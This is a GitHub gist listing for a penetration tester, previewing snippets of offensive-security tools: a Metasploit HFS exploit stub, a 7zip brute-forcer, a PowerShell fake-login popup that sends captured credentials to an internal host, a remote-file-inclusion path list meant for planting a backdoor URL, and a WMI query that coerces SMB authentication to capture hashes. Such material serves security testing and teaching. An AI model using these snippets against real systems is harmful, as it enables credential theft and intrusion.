Skip to content

Instantly share code, notes, and snippets.

View mubix's full-sized avatar
🎯
Focusing

Rob Fuller mubix

🎯
Focusing
3.3k followers · 430 following
View GitHub Profile
@mubix
mubix / hfs_script_inject.rb
Created September 15, 2014 14:22
HFS Script Injection module via https://github.com/rapid7/metasploit-framework/pull/3793
##
# This module requires Metasploit: http//metasploit.com/donload
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Reank = NormalRanking
@mubix
mubix / 7zbrute.rb
Created November 4, 2014 16:07
7zip Cracking on the cheap
#!/usr/bin/env ruby
# Need some help with this cracking script.
# Problems:
# 1) Slow, going through a large list like Rockyou takes forever
# 2) If there is no header encryption, 7z extracts to the target location
# then tries to decrypt, so threading would be painful
# 3) I need to know when the correct password is used and due to #2
# with threading that would be very difficult.
@mubix
mubix / get_rss.rb
Created December 23, 2014 14:52
Parse Site List for RSS
#!/usr/bin/env ruby
require 'feedbag'
require 'net/http'
source = Net::HTTP.get('ddosattackprotection.org', '/blog/cyber-security-blogs/')
body = source.split('"')
rss = []
body.each_with_index do |ob, index|
@mubix
mubix / powershellpopup.ps1
Created January 12, 2015 20:22
Powershell Popups, proxy aware and auth aware
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName + "\" + [Environment]::UserName,[Environment]::UserDomainName);
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
$wc = new-object net.webclient;
$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy;
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;
$wc.credentials = new-object system.net.networkcredential($cred.username, $cred.getnetworkcredential().password, '');
$result = $wc.downloadstring('https://172.16.102.163');
@mubix
mubix / Reset-KrbtgtKeyInteractive.ps1
Created February 17, 2015 03:13
Microsoft KRBTGT Reset script - https://gallery.technet.microsoft.com/Reset-the-krbtgt-account-581a9e51
<#----------------------------------------------------------------------------------------------------
Release Notes:
v1.4:
Author: Jared Poeppelman, Microsoft
First version published on TechNet Script Gallery
----------------------------------------------------------------------------------------------------#>
function Test-Command
{
@mubix
mubix / Bulles.md
Created April 30, 2015 02:40
OTP

Cipher Text #1:

214611044b181b161b040341061a000048150f0005554b5558514712031a061648080941060c520609130204195b522c4f170241071a011148000b0c040606455b5157410c141f001b4f47535d55060c050414412252040048030204055506171d1213040f55060a4815060a0e55060d0d41000006105212010f090805125216000e13410a1b1645050814120e115c45214611044b13130c0404034104031717480009054b1a04001a41060f0f551d130d1347000c141b0b48080941060c52090107024f4b341c0148150f001f551b1648160f184b3c52161d0204040e115c

Cipher Text #2:

200e0c041255000004080008041b0145090f03410a1b110c0d0f13411c101315070f14410a071745060e47121e170111011512150e55140a1a4106410c1a1d0148030b001801171748001341121a071748120e050e59520e010549
@mubix
mubix / wallpaper.rb
Created August 19, 2015 07:32
Wallpaper Script from Metasploit Minute
#Change Wallpaper
session = client
key = "HKCU"
wallpaper = "kerby.bmp"
based = "/root/kerby.bmp"
# based = File.join(Msf::Config.install_root, "data", wallpaper)
bgcolor = "0 0 0" # set to 255 255 255 for white
refresh_cmd = "rundll32.exe user32.dll, UpdatePerUserSystemParameters"
@mubix
mubix / set_wallpaper.rb
Created August 19, 2015 07:40
Set Wallpaper Metasploit Post Module from Metasploit Minute
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Post
include Msf::Post::File
@mubix
mubix / rfi-list.txt
Created October 31, 2015 16:27
RFI List that used to be hosted: http://ha.ckers.org/weird/rfi-locations.dat
# Compiled by RSnake 02/01/2010 Mostly from milw0rm osvdb.org and elsewhere.
# Change XXpathXX to the path of your backdoor. Note that you may need to
# try it against every directory on the target and because of how this was
# culled you may need to add a question mark to your own XXpathXX URL:
# Eg: XXpathXX => http://www.example.com/hax.txt?
/0_admin/modules/Wochenkarte/frontend/index.php?x_admindir=XXpathXX?
/123flashchat.php?e107path=XXpathXX
/2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=XXpathXX
/22_ultimate/templates/header.php?mainpath=XXpathXX
/22_ultimate/templates/header.php?mainpath=XXpathXX?
@mubix
mubix / WMIQuery_SMBAuth.ps1
Created December 18, 2015 03:20
Using a WMI Query to be able to capture credentials
$share = "\\192.168.1.245\share"
$query = "Associators of {win32_LogicalShareSecuritySetting='$share'}"
Get-WmiObject -query $query
<#
Obtained using Impacket's SMBServer.py example
Attacker: 192.168.1.245
Victim: 192.168.1.100
Result: